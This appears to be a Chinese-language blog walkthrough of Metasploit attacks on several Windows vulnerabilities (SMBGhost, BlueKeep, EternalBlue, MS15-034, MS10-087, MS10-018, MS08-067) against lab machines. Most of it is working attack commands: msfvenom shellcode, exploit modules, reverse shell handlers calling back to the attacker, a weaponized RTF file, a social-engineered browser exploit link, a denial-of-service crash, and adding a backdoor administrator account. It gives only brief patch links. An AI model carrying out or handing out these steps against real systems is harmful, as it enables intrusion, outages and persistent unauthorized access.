Metasploit之windows操作系统常见漏洞

2020-10-20  本文已影响0人  表弟_212

版本由高到低依次开车

1:永恒之蓝 2.0 <CVE-2020-0796>

- 复现

一、环境准备

目标机:windows10 1903 x64 ip:192.168.17.205 (关闭防火墙)
攻击机:kali ip:192.168.17.190

二、漏洞检测

利用POC检测:
检测工具:https://github.com/ollypwn/SMBGhost

image.png

三、漏洞攻击-蓝屏

POC下载:https://github.com/eerykitty/CVE-2020-0796-PoC

image.png

四、漏洞利用-getshell

脚本下载:https://github.com/chompie1337/SMBGhost_RCE_PoC
msfvenom生成正向连接木马

有关msfvenom详细使用可参考https://www.jianshu.com/p/dee2b171a0a0

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)


image.png

开启msf监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444//监听端口
set rhost 192.168.17.205 //目标主机
run

运行exploit.py脚本,反弹shell
按道理来说,这里反弹了一个shell的 可能出现反弹不了,win10的内存调整到4个G以上

image.png

OK,成功 getshell


image.png

技巧,winver查看系统版本


image.png

2:远程3389(CVE-2019-0708)与MS12-020

- 复现

一、环境准备

目标机:windows7
攻击机:kali ip:192.168.17.190
受影响的版本


image.png

二、进行攻击:

使用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 启用 0708RDP 攻击模块
使用 show options 查看相关信息和设置
关键设置主要为 RHOSTS / RPORT / target

set RHOSTS 受害机IP设置受害机IP
set RPORT 受害机PORT设置受害机RDP端口号
set target ID数字(可选为0-4)设置受害机机器架构
使用的是VMware,那么 target 2 满足条件
使用 exploit 开始攻击,等待建立连接


image.png

建立连接以后,使用shell获得shell


image.png

修复方法:微软已经于2019年05月4日发布了漏洞补丁,请进行相关升级:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC
Windows XP 及Windows 2003可以在以下链接下载补丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708

3网络服务器攻击渗透测试(MS17-010)

- 复现

一、环境准备

win7一台

二、进行攻击:

找到exploit windows/smb/ms17_010_eternalblue,
运行use exploitwindows/smb/ms17_010_eternalblue


image.png

输入show options 查看和配置RHOST(靶机)和LHOST(操作机)
由于我用的是虚拟电脑所以我环境已经配置好了。
如果你不知道那台电脑有漏洞你可以输入set LHOSTS 网关/24
如果是[+]前面是这样说明有漏洞,然后再set RHOST +IP。


image.png
设置TCP连接(新版本kali已经做好了这步) set payload windows/x64/meterpreter/reverse_tcp
image.png
run或exploit进行攻击

输入shell进入对方机器增加用户
以创建用户 net user test 1234 /add(xxxx用户名 1234密码)
net localgroup administrators test /add (将用户设置为管理员权限)


image.png
上传文件执行
image.png

4 : CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

- 复现

利用ms15-034漏洞读取服务器内存数据
借助metasploit平台,截图如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.80.130
run


image.png

利用ms15-034漏洞进行ddos攻击
同样借助metasploit平台,截图如下:
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.80.130
set threads 10
run


image.png
攻击开始后,win7瞬间蓝屏然后自动重启,截图如下:
image.png
漏洞修复
禁用IIS内核缓存(可能降低IIS性能)
image.png
image.png

5 : 应用软件格式渗透,利用word去渗透(MS10-087)

- 复现

生成文件

msf > search ms10_087
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
msf  exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_http
msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 10.10.10.131
msf  exploit(ms10_087_rtf_pfragments_bof) > exploit

//将文档从BT5拷贝到WIN XP靶机上

root@bt:~# cp /root/.msf4/data/exploits/ms10087.rtf   /root/ms10087.rtf
msf > use exploit/multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf  exploit(handler) > set LHOST 10.10.10.131
LHOST => 10.10.10.131
msf  exploit(handler) > exploit

6 : 浏览器攻击渗透(MS10-018)

- 复现

执行search ms10-018命令,搜索路径 browser浏览器的意思


image.png

执行use exploit/windows/browser/ms10_018_ie_behaviors命令。


image.png
执行show options命令,查看要设置哪些东西。
image.png

设置一下自己服务器的ip:set SRVHOST 192.168.11.111。


image.png
设置一个payload正向连接shell:
set PAYLOAD windows/meterpreter/bind_tcp
再看一下我们这个payload的选项配置:show options 一下
image.png
为了便于大家的识别我们把端口进行修改下:set LPORT 4441
image.png

run一下,会有一个url的地址,这个地址就是要通过社工等方法让目标机进行访问。


image.png

我们让目标机访问下这个url,这时msfconsole中就出现了successfuully,我们按回车(这里我尝试了好久,每次靶机访问IE就跳出OD来,最后把靶机里面的OD删掉就好了)。


image.png

我们看下sessions。


image.png
我们进入这个会话sessions -i 1(i就是in进入的意思,1就是会话的ID)。
image.png

成功进入


image.png

7 : 网络服务器攻击渗透(MS08-067)

- 复现

search ms08-067
use x
set rhost xxx.xxx.xx.xx
run
sucss then.......
shell....

............................................................bye

上一篇下一篇

猜你喜欢

热点阅读